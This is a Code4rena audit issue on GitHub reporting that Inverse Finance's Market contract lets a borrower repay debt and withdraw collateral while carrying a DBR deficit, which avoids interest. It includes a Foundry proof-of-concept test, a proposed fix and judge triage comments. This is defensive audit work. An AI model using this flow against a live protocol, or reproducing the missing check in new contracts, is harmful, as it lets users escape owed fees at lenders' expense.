User can pay its debt and withdraw its collateral without paying the interest rate. #311

code423n4 · 2022-10-29T22:03:37Z

Lines of code

https://github.com/code-423n4/2022-10-inverse/blob/main/src/Market.sol#L531

Vulnerability details

Impact

An user can repay all of his debt, and withdraw all his collateral calling the repayAndWithdraw function with uint withdrawAmount equal as debts[user] as input parameter, even if it has a deficit of DBR tokens.

Proof of Concept

There is not a requirement of not having a deficit of DBR tokens to be able to withdraw your collateral. It is true that a user that incurs in a deficit have the risk of someone calling forceReplenish on him, but if the user can front-run it, then the user will not need to pay for his DBR deficit.

To test this, i wrote the next test:

function testRepayAndWithdrawWitoutPayingDeficit() public {
        uint newWethTestAmount = 5 ether;
        gibWeth(user, newWethTestAmount);
        
        vm.startPrank(user);

        // Userr deposits 5 ether as collateral
        deposit(newWethTestAmount);

        assertEq(WETH.balanceOf(address(market.escrows(user))), newWethTestAmount, "failed to deposit WETH");
        assertEq(WETH.balanceOf(user), 0, "failed to deposit WETH");

        // The userr has no deficit
        assertEq(dbr.deficitOf(user), 0, "Incorrect Deficit");

        // He borrows 10 DOLA
        market.borrow(10 ether);

        // 1 year into the future
        vm.warp(block.timestamp + 365 days);
        
        // The user has a deficit of 10 DBR
        assertEq(dbr.deficitOf(user), 10 ether, "Incorrect Deficit");

        // But he is able to repay all the debt and withdraw all the collateral when having a DBR deficit.
        market.repayAndWithdraw(10 ether, newWethTestAmount);
        
        assertEq(WETH.balanceOf(address(market.escrows(user))), 0, "failed to withdraw WETH");
        assertEq(WETH.balanceOf(user), newWethTestAmount, "failed to withdraw WETH");
    }

Tools Used

Manual review

Recommended Mitigation Steps

Don't allow to withdraw the collateral if the user has a deficit of DBR tokens.

The text was updated successfully, but these errors were encountered:

c4-judge · 2022-11-05T21:25:23Z

0xean marked the issue as duplicate

Simon-Busch · 2022-12-05T15:38:29Z

Issue marked as satisfactory as requested by 0xean

c4-judge · 2022-12-07T08:16:07Z

Simon-Busch marked the issue as duplicate of #583

code423n4 added 2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working labels Oct 29, 2022

code423n4 added a commit that referenced this issue Oct 29, 2022

0xRobocop issue #311

b783939

d3e4 mentioned this issue Nov 4, 2022

If transferring DBR after borrowing DOLA in same transaction, DBR amount that is used already for borrowing DOLA can still be shared to allow users who do not own DBR to borrow DOLA #579

Closed

c4-judge closed this as completed Nov 5, 2022

c4-judge added the duplicate-401 label Nov 5, 2022

Simon-Busch added the satisfactory satisfies C4 submission criteria; eligible for awards label Dec 5, 2022

c4-judge added duplicate-583 and removed duplicate-401 labels Dec 7, 2022

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

User can pay its debt and withdraw its collateral without paying the interest rate. #311

User can pay its debt and withdraw its collateral without paying the interest rate. #311

code423n4 commented Oct 29, 2022

c4-judge commented Nov 5, 2022

Simon-Busch commented Dec 5, 2022

c4-judge commented Dec 7, 2022

User can pay its debt and withdraw its collateral without paying the interest rate. #311

User can pay its debt and withdraw its collateral without paying the interest rate. #311

Comments

code423n4 commented Oct 29, 2022

Lines of code

Vulnerability details

Impact

Proof of Concept

Tools Used

Recommended Mitigation Steps

c4-judge commented Nov 5, 2022

Simon-Busch commented Dec 5, 2022

c4-judge commented Dec 7, 2022